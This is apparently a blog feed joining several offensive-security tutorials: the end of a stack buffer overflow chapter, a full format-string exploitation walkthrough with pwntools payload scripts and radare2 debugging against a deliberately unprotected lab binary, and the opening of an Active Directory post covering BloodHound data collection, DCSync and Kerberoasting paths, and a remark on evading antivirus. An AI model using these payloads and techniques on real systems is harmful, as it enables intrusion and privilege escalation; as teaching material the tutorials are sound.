After executing our setup, the next step is straightforward. We&apos;ll use the command &quot;dc&quot; to progress to the breakpoint. Following this, we&apos;ll employ the command &quot;v&quot; to reveal the contents of the eax register. Why eax, you ask? Well, in this scenario, eax holds the key to our puzzle – it contains the address of `buf`. This happens because of how the function handles its arguments: `buf` is transferred to eax and then strategically positioned on the stack, paving the way for `strcpy` to do its job effectively. It&apos;s worth noting that in my specific use of radare2, `buf` is referred to as &quot;dest,&quot; a minor but crucial detail to keep in mind.

![](/content/images/2023/11/image-47.png)

dest as the name of the variable buf

Upon successful execution and positioning ourselves at the designated instruction, an interesting revelation unfolds. We can observe that the memory address of `buf` now holds the content we&apos;ve meticulously crafted and passed through our exploit. This is a pivotal moment in our journey of exploit development, as it visually confirms the successful manipulation of the program&apos;s memory – a clear indicator that our exploit is on the right track.

![](/content/images/2023/11/image-48.png)

buf memory address

Now at this crucial juncture, our next objective is to pinpoint and modify the memory address of the `zero` variable using `plen`. To achieve this, we turn to the command &quot;afvd&quot; in our toolkit. This command is quite handy as it displays the variables along with their respective values in the current context. Through this process, we identify that in our memory landscape, `var_6h` is the label for `zero`, and intriguingly, `var_ch` represents `plen`. This information is vital as it lays the groundwork for the precise memory manipulation required for our exploit to succeed.

![](/content/images/2023/11/image-49.png)

Variables values

This insightful deduction comes from a close examination of the program&apos;s assembly code. If we observe the assembly code, as illustrated in the accompanying figure, we notice that `var_6h` is established right at the outset and is initialized with a value of 0. This clearly suggests its role as the `zero` variable. Similarly, `var_ch` emerges as a key player during the stack preparation phase, particularly in the lead-up to calling `printf` alongside `dest` (which we&apos;ve previously identified as `buf`). This contextual placement strongly implies that `var_ch` is indeed what we refer to as `plen`. These subtle hints hidden within the assembly code are crucial for understanding and manipulating the program&apos;s behavior.

![](/content/images/2023/11/image-50.png)

Zero and plen in memory

Armed with this crucial data, we are now in a position to construct a fully functional exploit.

```python
from pwn import * 
import sys

buf_addr = &lt;change&gt;
buf_size = 256
zero_addr = &lt;change&gt;
shellcode = shellcraft.echo(&quot;hello\n&quot;)

payload = b&quot;\x90&quot; * 80
payload += asm(shellcode)
payload +=  b&quot;D&quot;*(256-80-len(asm(shellcode))) 
payload += p32(zero_addr) # pline
payload += b&quot;AA&quot; # zero addr -&gt; random
payload += p32(buf_addr) # ebp -&gt; random
payload += p32(buf_addr) # return addr
payload += b&quot;C&quot; * (65536-256-14)                
sys.stdout.buffer.write(payload)


```

The payload we&apos;ve crafted is essentially a practical implementation of the strategy outlined earlier. Initially, we populate the `buf` variable with a sequence of NOPs (No Operation Performed), creating a buffer zone. This is followed by a strategically placed shellcode designed to execute a simple &quot;hello&quot; command. For the remaining space in `buf`, we employ the character &quot;D&quot; to cap it off. The crux of our payload involves inserting the memory address of `zero` into `plen`, and finally, we input the return address - which is the address of `buf`. To achieve the specific character count needed for our exploit (here, we use the character &quot;C&quot; to pad out the payload), we meticulously fill the remaining space. It’s important to note that in this scenario, the actual values of `zero` and `ebp` are inconsequential to us; they are essentially placeholders.

However, an interesting observation arises when we run this exploit: it leads to an infinite loop. This unexpected behavior signals that there&apos;s more to explore and adjust in our exploit development process.

![](/content/images/2023/11/image-51.png)

Infinite loop

So, what went awry? To unravel this mystery, a deeper dive into the binary is essential. Given that our primary issue is the infinite loop, our focus shifts to verifying whether the `zero` variable is being modified as intended. To do this, we&apos;ll zero in on the state of the program immediately following the execution of `strcpy`. This targeted approach will allow us to scrutinize the relevant changes and interactions at a critical juncture in the exploit&apos;s execution, shedding light on why the infinite loop is occurring.

![](/content/images/2023/11/image-54.png)

After reaching the crucial point post-`strcpy` execution, our next step is to reapply the &quot;afvd&quot; command. This time, our goal is to acquire the memory address of the variable `var_ch`, which we know represents `plen`. Following this, we&apos;ll employ the &quot;pd&quot; command to delve into the memory and examine the contents of `var_ch`. This process is vital for understanding how our exploit interacts with the memory and will provide valuable insights into the state and behavior of `plen` within the program&apos;s memory structure.

![](/content/images/2023/11/image-57.png)

In the provided image, we get a clear view of the stack&apos;s contents, offering us a crucial checkpoint in our analysis. This visual representation confirms that our buffer overflow attempt has indeed been successful – evidenced by the injection of memory addresses and the presence of &quot;AA&quot; characters (represented in hexadecimal as 41). However, there&apos;s a twist: the number of characters isn&apos;t aligned as anticipated. The data appear to be in disarray. A closer examination reveals that the intended return address has been inadvertently occupied by the &quot;C&quot; padding, not the actual buffer address as planned. Additionally, the ebp (base pointer) is not positioned correctly. To better understand this misalignment, let&apos;s turn to a diagram for a more visual explanation:

![](/content/images/2023/11/image-58.png)

To achieve the correct alignment, we deduce that an addition of 6 more characters is necessary. This begs the question: How did this oversight occur in our initial calculations?

![](/content/images/2023/11/image-59.png)

Sample of defined variables

The root of our miscalculation lies in an unexpected twist introduced by the compiler: it added &quot;2 plen&quot; into the mix, throwing our original strategic calculations off balance. Upon closer inspection of the main function&apos;s variables, as depicted in the image above, we notice that both `var_ch` and `plen` are occupying additional space on the stack than we initially accounted for. This additional space usage by the compiler alters the memory layout we based our exploit on. To better grasp this alteration and its impact on our exploit, let&apos;s refer to a more detailed image that visually lays out the current stack situation:

![](/content/images/2023/11/image-60.png)

Moreover, a closer examination of `var_ch` reveals another crucial detail: contrary to the typical 4-byte occupation, it actually occupies 6 bytes. Armed with this revelation and the insights previously gathered, we&apos;re now poised to revise our exploit accordingly. Let&apos;s take a look at how the updated exploit might be structured:

```python
from pwn import * 
import sys

buf_addr = 0xfffecf4c 
buf_size = 256
zero_addr = 0xfffed052 #buf_addr + buf_size + 4 + 2
shellcode = shellcraft.echo(&quot;hello\n&quot;)

payload = b&quot;\x90&quot; * 80
payload += asm(shellcode)
payload +=  b&quot;D&quot;*(256-80-len(asm(shellcode))) 
payload += p32(zero_addr) # var_ch
payload += b&quot;EE&quot; #2 bytes of var_ch
payload += b&quot;AA&quot; # zero
payload += b&quot;EEEE&quot; #plen
payload += p32(buf_addr) # ebp
payload += p32(buf_addr)
payload += b&quot;C&quot; * (65536-256-20)                
sys.stdout.buffer.write(payload)

```

Upon executing our revised exploit within radare2, we can observe a satisfying alignment: all the values now correspond precisely as intended.

![](/content/images/2023/11/image-61.png)

By completing the execution process, we reach a pivotal moment: the successful execution of our code is now evident.

![](/content/images/2023/11/image-37.png)

Interestingly, a closer look reveals that after executing `printf`, we can adeptly modify the memory values, skillfully circumventing the potential for an infinite loop.

![](/content/images/2023/11/image-62.png)

# Conclusions

In today’s enlightening journey, we have navigated the complex waters of binary exploitation, focusing on the confluence of buffer overflow and format string vulnerabilities. This thorough exploration has not only reinforced our theoretical understanding but also highlighted the crucial importance of practical experimentation and adaptability in the field of cybersecurity.

Throughout this process, we uncovered how minute details, such as unexpected memory allocation by the compiler, can significantly deviate our initial plans. This experience underscores the importance of meticulous evaluation and a step-by-step problem-solving approach. It also illuminates the invaluable role of tools like radare2 in visualizing and manipulating a program’s memory structure.

The ability to adapt and refine our approaches in the face of unexpected challenges is essential. Each obstacle encountered and overcome not only enhances our exploitation technique but also deepens our understanding of the systems we seek to protect.

In conclusion, this chapter has been more than an exercise in exploit development; it&apos;s been a lesson in tenacity and continuous learning. It reminded us that in the realm of cybersecurity, theory and practice go hand in hand, and being prepared for the unexpected is an integral part of our quest to strengthen and secure our digital systems.

# Resources

[Ataque Format String · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/format-string/5-practica.html)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Format String Exploits: A Comprehensive Guide</title><link>https://www.kayssel.com/post/format-string</link><guid isPermaLink="true">https://www.kayssel.com/post/format-string</guid><description>Explore the intricacies of format string vulnerabilities in C programming. Learn their risks, exploit development with radare2, and crafting Python exploits. Gain crucial insights into secure coding practices.</description><pubDate>Sun, 05 Nov 2023 12:42:22 GMT</pubDate><content:encoded># **Delving into Format String Vulnerabilities: An Educational Expedition**

Welcome, cyber enthusiasts and aspiring security professionals! Today&apos;s chapter unfolds an intriguing aspect of cybersecurity – the format string vulnerability, a classic yet crucial topic in the realm of secure coding. My personal journey with this vulnerability holds a special place, as it was the first one I mastered, offering insights not just into code exploits but also into the broader landscape of software vulnerabilities.

In this chapter, we&apos;re set to embark on a comprehensive journey, starting from the very basics of what a format string is and how it functions in the C programming language. We&apos;ll see how a simple string formatting feature in `printf` can turn into a security vulnerability when influenced by user input.

Our expedition will take us through:

1.  **The Anatomy of Format Strings**: Understanding how format strings operate within `printf`, showcasing their standard use and potential pitfalls.
2.  **Unveiling the Vulnerability**: A step-by-step breakdown of how format strings can be exploited, using a sample C program as our testing ground.
3.  **Exploit Development with Radare2**: Employing the powerful binary analysis tool, radare2, we will analyze, debug, and manipulate our test program, gaining hands-on experience in exploit development.
4.  **Crafting a Python Exploit**: Translating our findings into a practical exploit script, showcasing the real-world application of our theoretical knowledge.
5.  **Understanding the Risks**: Highlighting the critical importance of secure coding practices and the potential consequences of overlooking format string vulnerabilities.

Whether you&apos;re a seasoned security professional or a curious novice, this chapter promises a blend of technical depth and accessible learning. By the end of our exploration, you&apos;ll not only understand the intricacies of format string vulnerabilities but also appreciate their significance in the broader context of cybersecurity. So, let&apos;s dive in and unravel the mysteries of format string vulnerabilities together!

# **Understanding Format Strings: The Basics of `printf` Functionality**

Dive into the world of C programming where the format string stands as a key player in shaping the output of the `printf` function. Imagine you&apos;re working with the following C code:

```c
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv){
  char to_print[5] = &quot;hello&quot;;
  printf(&quot;%s\n&quot;,to_print);
  printf(&quot;%x\n&quot;,to_print);
}

```

In this snippet, `to_print` is a friendly string that `printf` greets twice, each time with a different perspective. The `%s` specifier asks for a straightforward introduction in ASCII, while `%x` takes a more mysterious route, revealing the string&apos;s memory address in hexadecimal form.

![](/content/images/2023/11/image.png)

Exemplify what is a format string

These format specifiers, `%s` and `%x`, are like secret codes that control how data is presented. There&apos;s a whole world of them, such as `%d` for integers, each adding its unique flavor to the output. But here&apos;s a twist: if an attacker gets the reins over these format strings, it&apos;s not just about changing presentations anymore—it could open up serious security loopholes. And guess what? We&apos;re about to explore this intriguing and risky avenue in our next section! Stay tuned.

# **Exploring the Intricacies of a Format String Vulnerability**

Let&apos;s delve into the mechanics of a format string vulnerability, using a simple yet illustrative piece of C code. Picture this:

```c
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void vuln(char *vuln_param){
  int local_var = 0x123;
  char str[13] = &quot;AAAABBBBCCCC\0&quot;;
  char to_print[6]  = &quot;hello\0&quot;;
  printf(vuln_param, to_print);
}

int main(int argc, char **argv){
  vuln(argv[1]);
}

```

Here, we have a classic setup with two functions, `main` and `vuln`, where `vuln` gets a spotlight by `main`. The twist? The user-supplied argument directly enters the `printf` function, handing over an unusual level of control to an external user.

Inside, variables like `local_var`, `str`, and `to_print` are not just random data; they&apos;re key players setting the stage for our vulnerability exploration.

Now, let&apos;s compile this intriguing code:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o formatstring formatstring.c

```

![](/content/images/2023/11/image-2.png)

Example of normal execution

Under normal circumstances, what you type is what you get on the screen. But what if we spice things up a bit? Enter `%s` or `%x` as format strings, and suddenly, `printf` unveils either `to_print`&apos;s content or its memory address.

![](/content/images/2023/11/image-4.png)

Example introduction of format strings

![](/content/images/2023/11/image-5.png)

Introduction of multiple format strings

But wait, there&apos;s more! What if we flood `printf` with a barrage of `%x`s? Surprise: a memory dump! Why does this happen? `printf`, in its diligent efforts, matches the number of format strings with arguments. Excess format strings lead to unintended memory revelations. For instance, enter enough `%x`s, and you&apos;ll see &quot;42414141&quot;, the ASCII equivalent of &quot;BAAA&quot; - a peek into the `str` variable&apos;s memory.

![](/content/images/2023/11/image-7.png)

Recognizing data

This diagram here simplifies what&apos;s happening when we overload `printf` with format strings, unlocking the potential to access hidden memory data.

![](/content/images/2023/11/image-9.png)

Stack diagram

So, we&apos;ve learned to unearth the process&apos;s in-memory secrets. But is that all? Can this vulnerability be leveraged further? Let&apos;s keep digging to find out!

# **Mastering the Art of Memory Manipulation: The Format String Offense**

Diving into the realm of format string vulnerabilities, we encounter `%n` – a seemingly innocuous player that holds the power to write into memory. The `printf` function, often a benign utility, can turn into a hacker&apos;s canvas when `%n` comes into play, especially when influenced by external, user-provided data.

```bash
man 3 printf

```

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole. Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.
  &lt;/div&gt;
&lt;/div&gt;

The `printf` function, when fed with untrusted input containing `%n`, inadvertently becomes a tool to modify memory. This ability to write arbitrarily in memory opens up two intriguing pathways for exploitation:

1.  **Variable Overwrite**: Imagine being able to change the value of a variable within a program, potentially unlocking areas or functionalities that are meant to be off-limits.
2.  **Return Address Hijacking**: The more ambitious path – modifying the return address of a function to wrestle control over the program&apos;s execution flow.

![](/content/images/2023/11/image-17.png)

Attack methodology

For today&apos;s exploration, our focus is laser-sharp on the latter: manipulating the function&apos;s return address. Here&apos;s the game plan:

1.  Insert the memory address containing the return address into `printf`.
2.  Scout for this address in the memory using `%x`.
3.  Once located, switch `%x` with `%n` to overwrite the return address.

Sounds complex? Fear not! We&apos;re about to break it down step by step, transforming this high-level strategy into an actionable exploit. Let&apos;s embark on this journey of memory manipulation!

# Exploit Development

## **Crafting the Exploit: Navigating the Memory Maze**

Embarking on the quest to develop an exploit for the format string vulnerability, the initial step is pinpointing the return address of the function. This critical detail lies within the recesses of the program&apos;s memory, and to uncover it, we turn to the trusty tool `radare2`.

```bash
r2 -d formatstring

```

Using `radare2`, we delve into the binary&apos;s structure, laying the groundwork for our exploit. The goal is to set a strategic breakpoint at the start of the vulnerable function.

![](/content/images/2023/11/image-12.png)

We analyzed and found vulnerable function name

![](/content/images/2023/11/image-13.png)

We set a breakpoint at the beginning of the function

Once reached, we employ the command &quot;dc&quot; to advance the program&apos;s execution to this point, allowing us to scrutinize the stack.

![](/content/images/2023/11/image-23.png)

Memory address pointing to the return address

Our prize? The memory address where the function&apos;s return address resides. Visualized in red in the provided image, this address is the key to manipulating the program&apos;s execution flow. For clarity, observe how this address aligns with the next instruction after the vulnerable function&apos;s execution.

![](/content/images/2023/11/image-15.png)

Return address

## **Constructing the Payload: A Step Towards Control**

Equipped with the knowledge of the memory address containing the function&apos;s return address, we move to the next phase of our exploit: crafting a payload that harnesses this information.

Our Python script, leveraging the power of the `pwn` library, is succinct yet potent. The script constructs a payload that embeds the crucial memory address:

```python
from pwn import *
import sys

payload = b&quot;&quot;
payload += p32(0xffffd920)
sys.stdout.buffer.write(payload)

```

In this snippet, `p32(0xffffd920)` translates the memory address into a 32-bit little-endian format, which is the format expected by our vulnerable program. This payload is then outputted, ready to be fed into the program as input.

![](/content/images/2023/11/image-18.png)

Memory address not displayable

When this payload is executed as an argument to our vulnerable program, it passes the memory address directly to `printf`. However, as it stands, this address is merely passed along - it won&apos;t display anything on its own since it&apos;s not a string or a recognizable format specifier.

## **Refining the Payload: Pinpointing the Return Address**

The journey of exploit development now enters a crucial phase where precision and observation converge. Our objective is to locate and manipulate the return address within the program&apos;s memory, using the format string vulnerability. To achieve this, we refine our Python exploit further, incorporating &quot;%x&quot; format specifiers to traverse and inspect the program&apos;s memory space.

```python
from pwn import *
import sys

payload = b&quot;&quot;
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 190
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-24.png)

Recognizable patternRecognizable pattern

As depicted in the image above, a distinctive &quot;pattern&quot; begins to emerge from the yellow segment onwards. These values correspond to &quot;%x&quot;.

![](/content/images/2023/11/image-21.png)

Identify that it is &quot;%x&quot;

In simpler terms, we have successfully arrived at the memory section housing the first parameter we&apos;ve supplied to printf.

![](/content/images/2023/11/image-22.png)

Updated diagram

However, when we inspect the memory dump image, discerning the precise location of the return address becomes a formidable challenge. Hence, we shall employ a series of &quot;A&quot; characters to pad the way.

```python
from pwn import *
import sys

payload = b&quot;A&quot; * 29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 190
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-25.png)

Recognizing the memory address

Thanks to this padding, combined with the matching &quot;%x&quot; pattern, we can now approximate the whereabouts of the return address, which we must target with &quot;%n.&quot; Our main objectives at this stage are twofold:

1.  Identify the exact &quot;%x&quot; that corresponds to the target address.
2.  Group the address into a single &quot;%x&quot; and subsequently transform it into &quot;%n.&quot;

With these goals in mind, let&apos;s adapt our exploit to locate the crucial &quot;%x.&quot;

```python
from pwn import *
import sys

payload = b&quot;A&quot; * 29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 190
payload += b&quot;%x&quot;
payload += b&quot;B&quot; * 34
sys.stdout.buffer.write(payload)

```

-   To start, we&apos;ve introduced a separate &quot;%x,&quot; which we will later convert to &quot;%n.&quot;
-   Additionally, we&apos;ve appended padding &quot;B&quot; characters to ensure proper alignment of values, ensuring that the memory address we&apos;ve injected remains a unique &quot;%x.&quot;

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    At this juncture, I recommend executing the exploit directly with radare2 to scrutinize its behavior.
  &lt;/div&gt;
&lt;/div&gt;

Upon running the script, we notice that we still have a considerable number of &quot;%x&quot; ahead. Therefore, further adjustments and fine-tuning are required.

![](/content/images/2023/11/image-33.png)

Entering the padding at the end with &quot;B&quot;

When you reach the point where the &quot;%x&quot; stops displaying memory address values, it&apos;s time to refine the count of &quot;B&quot; characters at the end. In my case, the exploit has settled at 171 &quot;%x.&quot;

```python
from pwn import *
import sys

payload = b&quot;A&quot;*29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 170
payload += b&quot;%x&quot;
payload += b&quot;B&quot;* 34
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-34.png)

We finish finding the %x

As we execute this script, we observe the memory dump and make iterative adjustments to the number of &quot;%x&quot; and &quot;B&quot;s, striving for an alignment that places our target address precisely within a single &quot;%x&quot;. This meticulous process involves running the script multiple times, each time tweaking the payload slightly:

```python
from pwn import *
import sys

payload = b&quot;A&quot;*29
payload += p32(0xffffd6e0)
payload += b&quot;%x &quot; * 170
payload += b&quot;%x&quot;
payload += b&quot;B&quot;* 30
sys.stdout.buffer.write(payload)

```

![](/content/images/2023/11/image-29.png)

%x number 171

When the alignment is perfected, the targeted &quot;%x&quot; now precisely corresponds to our injected memory address. This setup is verified by placing a breakpoint just before the function returns and inspecting the stack. The modification of the return address becomes evident, signifying our successful manipulation.

![](/content/images/2023/11/image-31.png)

Breakpoint just before leaving the vulnerable function

![](/content/images/2023/11/image-30.png)

Evidence of modification of return address

Continuing the execution post-modification leads to an error - a clear indication of our exploit&apos;s impact. We have effectively altered the program&apos;s execution flow, demonstrating the potency of format string vulnerabilities.

![](/content/images/2023/11/image-32.png)

Change of the return address

# **Concluding Insights: The Power and Risks of Format String Vulnerabilities**

In this exploration of format string vulnerabilities, we&apos;ve delved deep into the mechanics and implications of this classic yet potent security flaw. Our journey illuminated the dual aspects of format strings in C programming: their utility in formatting outputs and their potential as a security vulnerability when improperly managed.

Key Takeaways:

1.  **Understanding Format Strings**: We began by understanding the basic role of format strings in functions like `printf`, where they dictate how variables are displayed. The seemingly benign use of `%s` for strings or `%x` for hexadecimal values, when user-controlled, opened the door to memory manipulation.
2.  **Vulnerability in Action**: Through a hands-on example, we witnessed how user-controlled format strings could lead to memory dumps. The `printf` function&apos;s expectation of matching format strings and arguments, when unmet, inadvertently led to revealing or altering memory contents.
3.  **Crafting the Exploit**: The real crux of our journey was developing an exploit. We methodically constructed a Python script to exploit the vulnerability, showcasing each step from injecting memory addresses to locating and modifying the return address of a function.
4.  **Radare2 as a Tool**: Utilizing radare2, a powerful binary analysis tool, we analyzed and debugged our vulnerable program. This process was instrumental in understanding the stack&apos;s behavior and refining our exploit.
5.  **Exploitation Strategy**: Our exploit strategically used `%n`, a format specifier that allows writing to memory, turning a simple output function into a potent tool for altering a program&apos;s execution flow.
6.  **Implications and Caution**: This exploration underscores the significance of validating and sanitizing user input, particularly in functions that handle format strings. It serves as a reminder of the delicate balance between functionality and security in programming.

In summary, the format string vulnerability offers a compelling case study in cybersecurity. It exemplifies how a fundamental aspect of programming can be twisted into a security threat, reminding us of the constant vigilance required in the digital realm. Our hands-on approach not only unveiled the technicalities of exploiting this vulnerability but also highlighted the broader implications for secure coding practices. As we conclude this chapter, we are left with a deeper appreciation for the intricacies of cybersecurity and the ever-evolving challenge of protecting digital systems.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is format string ?&lt;/summary&gt;

A format string is nothing more than a way for the &quot;printf&quot; function to set the output format that a given value will take. For example, %x is used to display the value in hexadecimal while %s is used in ASCII.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What are the consequences of passing user-controlled parameters to printf?&lt;/summary&gt;

-   It may cause you to enter multiple &quot;%x&quot; so that it dumps the entire contents of memory.
-   Secondly, it can cause an attacker to enter &quot;%n&quot; and thus be able to modify values in memory.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main thing an attacker can look for by modifying values with format string?&lt;/summary&gt;

-   You may be looking to modify the return address of a function.
-   You may be looking to modify the value of a particular variable to change the execution flow of a program.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Could you tell me what are the key points to look at when we are exploiting this vulnerability and we want to modify the return address?&lt;/summary&gt;

![](/content/images/2023/11/image-17.png)

Attack methodology
&lt;/details&gt;

# Resources

[Vulnerabilidades Format String · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/format-string/5-format-string.html)</content:encoded><author>Ruben Santos</author></item><item><title>Active Directory Enumeration: Automated and Manual Techniques for Privilege Escalation</title><link>https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration</link><guid isPermaLink="true">https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration</guid><description>Explore Active Directory enumeration and privilege escalation techniques, using tools like BloodHound for automatic insights and PowerView for stealthy, manual analysis in complex network environments</description><pubDate>Mon, 23 Oct 2023 14:18:11 GMT</pubDate><content:encoded># Decoding Active Directory: From Enumeration to Escalation

Welcome to a new chapter in the world of Active Directory (AD) exploration! If you&apos;ve been following our series, you&apos;re already familiar with the basics of AD and the common attacks used for initial access in these environments. Now, we&apos;re shifting gears to focus on methods of enumerating Active Directory once we have a foothold, coupled with strategies for privilege escalation.

Today&apos;s journey dives into the realm of automatic enumeration with BloodHound, a tool that has become indispensable for its ability to unravel complex privilege relationships in AD environments. We&apos;ll also walk through manual enumeration techniques, utilizing PowerView and windapsearch, for those instances where discretion and stealth are paramount.

This chapter is about striking the perfect balance: using advanced tools like BloodHound for comprehensive insights while also mastering the art of manual enumeration to minimize our digital footprint. Whether you&apos;re part of a red team needing to move quietly or you&apos;re just looking to expand your AD knowledge, this chapter will equip you with both the tools and the understanding necessary to navigate the multifaceted landscape of Active Directory.

So gear up, as we embark on this detailed journey to master the art of AD enumeration and leverage this knowledge for effective privilege escalation. Let&apos;s get started!

# Optimizing Active Directory Audits: Profound Insights with BloodHound, Sharphound, Python-Bloodhound, and RustHound

In the realm of Active Directory domain enumeration, BloodHound emerges as a pivotal tool, particularly for internal audits where network noise is a secondary concern. It functions like a navigational compass, pointing the way to privilege escalation within a domain. BloodHound, in essence, employs graph theory to uncover hidden relationships within an Active Directory or Azure environment, simplifying the visualization of complex attack paths. The installation of BloodHound is straightforward, following a basic tutorial available on Kali Linux&apos;s website.

[bloodhound | Kali Linux Tools](https://www.kali.org/tools/bloodhound/)

Once installed, accessing BloodHound is done through Neo4j credentials, leading to a user-friendly graphical interface.

## Python-Bloodhound: Efficiently Enumerating Active Directory for Security Analysis

Setting up the graphical interface of BloodHound is just the initial step. The real power of BloodHound comes to the fore when it&apos;s fed with comprehensive data from the target network. To gather this data, there are several effective tools at your disposal, each with its unique advantages.

One of the most user-friendly options is &quot;bloodhound-python&quot;, which can be run directly from your Kali machine. This tool is designed to extract a wide array of data in an efficient manner. A typical command to gather extensive data using bloodhound-python looks something like this:

```bash
bloodhound-python -u beruinsect -p &apos;Password1&apos; -ns 192.168.253.120 -d shadow.local -c all --zip 
```

In this command:

-   `-u beruinsect` and `-p &apos;Password1&apos;` specify the username and password.
-   `-ns 192.168.253.120` indicates the IP address of the name server.
-   `-d shadow.local` specifies the domain.
-   `-c all` tells the tool to collect all types of data.
-   `--zip` compresses the collected data into a zip file for easy upload to BloodHound.

![](/content/images/2023/10/image-60.png)

In scenarios where you&apos;re using dynamic port forwarding, you might need to run bloodhound-python through proxychains to ensure it can communicate with the network. This would look something like:

```bash
proxychains bloodhound-python -u beruinsect -p &apos;Password1&apos; -ns 192.168.253.120 -d shadow.local -c all --zip --dns-tcp
```

## RustHound: A Rapid Approach to Active Directory Data Collection

RustHound emerges as a compelling alternative for data collection in Active Directory environments, especially when speed is a critical factor. Although it might not boast the comprehensive feature set of bloodhound-python, RustHound compensates with its rapid data acquisition capabilities. What makes RustHound particularly intriguing is its knack for uncovering privilege escalation paths that might elude bloodhound-python.

This distinct edge in RustHound&apos;s functionality can be a game-changer in certain scenarios. By offering different insights and potentially revealing unique escalation routes, RustHound adds another dimension to your enumeration strategy. It&apos;s a testament to the fact that in the realm of network security and penetration testing, having a diverse toolkit can lead to more thorough and effective exploration of potential vulnerabilities.

Utilizing RustHound from Kali Linux can supplement the data gathered by other tools, providing a more rounded view of the network&apos;s security posture. It&apos;s an excellent example of how varied tools can complement each other, enhancing the overall effectiveness of your security analysis.

[GitHub - NH-RED-TEAM/RustHound: Active Directory data collector for BloodHound written in Rust. 🦀](https://github.com/NH-RED-TEAM/RustHound)

## Sharphound: The Essential Binary Tool for In-Depth Active Directory Analysis

Sharphound stands as a prominent tool in the realm of Active Directory enumeration, widely recognized for its efficacy in data collection. However, its popularity comes with a caveat - it&apos;s well-known to antivirus solutions. This recognition often leads to immediate detection and removal by antivirus programs, posing a significant challenge for its deployment.

To effectively utilize Sharphound in environments with active antivirus protection, one must employ evasion techniques to bypass these security measures. This could involve modifying the Sharphound binary to evade signature-based detection or using more sophisticated methods to cloak its activities.

The necessity to circumvent antivirus detection underscores the continuous cat-and-mouse game between security tools and protective measures. Sharphound’s effectiveness makes it a valuable asset for penetration testers and security analysts, but its conspicuous nature demands a higher level of stealth and creativity in its application.

For those interested in exploring Sharphound&apos;s capabilities and integrating it into their security assessments, the official repository provides a wealth of information and resources. It serves as a starting point for understanding the tool&apos;s functionality and potential applications in unraveling complex Active Directory environments.

[GitHub - BloodHoundAD/SharpHound: C# Data Collector for BloodHound](https://github.com/BloodHoundAD/SharpHound)

## Data Visualization with Bloodhound: Unraveling Active Directory&apos;s Hidden Paths

After successfully gathering data using tools like bloodhound-python, RustHound, or SharpHound, the next critical step is to upload this data into BloodHound for analysis. This is a straightforward process. BloodHound provides an intuitive user interface, featuring a dedicated button for importing data.

You simply locate the button for uploading data, which is typically found on the BloodHound interface. Clicking this button will prompt you to select the data file you wish to upload. This file is often in a compressed format (like .zip), containing all the information gathered by your chosen data collection tool.

For instance, if you used bloodhound-python, your data file might be named something like &apos;python-bloodhound.zip&apos;. Select this file, and BloodHound will begin processing and integrating the data into its database. Once the upload is complete, BloodHound will display the newly imported data, ready for you to analyze. You can now explore various attack paths, identify potential vulnerabilities, and plan your approach for privilege escalation or other security assessments within the Active Directory environment.

![](/content/images/2023/10/image-62.png)

Uploading data to BloodHound

![](/content/images/2023/10/image-63.png)

.zip formed by python-bloodhound.zip

Once we&apos;ve loaded the data into BloodHound, we embark on a journey of analytical possibilities. This powerful tool unfolds a variety of predefined paths for exploration. For instance, it effortlessly reveals users within the Active Directory who are susceptible to Kerberoasting. This feature is pivotal as it helps us pinpoint potential targets for elevating our privileges within the domain.

![](/content/images/2023/10/image-64.png)

Users vulnerable to Kerberoast

But that&apos;s just the beginning. BloodHound also guides us in finding the most direct and efficient route to the coveted position of a domain administrator. And if you&apos;re contemplating executing a DCSync attack, BloodHound brilliantly illuminates various pathways to accomplish it successfully.

![](/content/images/2023/10/image-65.png)

Shortest way to become a domain administrator

![](/content/images/2023/10/image-67.png)

Possible ways to do dcsync

What&apos;s truly captivating about BloodHound is its ability to provide detailed guidance on how to exploit specific configurations. A simple right-click on any graph link reveals necessary information for leveraging that particular setup. This level of detail is invaluable, especially when dealing with extended rights and other intricate aspects of Active Directory.

![](/content/images/2023/10/image-68.png)

Edge help

![](/content/images/2023/10/image-69.png)

Path to escalate privilegesPath to escalate privileges

And if these predefined routes aren&apos;t enough, BloodHound allows you to dive deeper. You can craft your own custom queries using the Cypher language, utilized in Neo4j. This means you can fine-tune your search to extract precisely the information you need. For example, if you&apos;re interested in service accounts that might be vulnerable to Kerberoasting and contain &apos;SQL&apos; in their names, BloodHound enables you to formulate a specific query for that.

![](/content/images/2023/10/image-70.png)

Creation of own queries

Imagine you want to delve deeper into identifying service accounts potentially vulnerable to Kerberoasting and specifically those associated with &apos;SQL&apos;. BloodHound empowers you with the ability to create such targeted queries. Using its Cypher query language, you can pinpoint these accounts with precision.

Here&apos;s how you can structure this specific query:

```cypher
MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS &apos;SQL&apos;)RETURN u

```

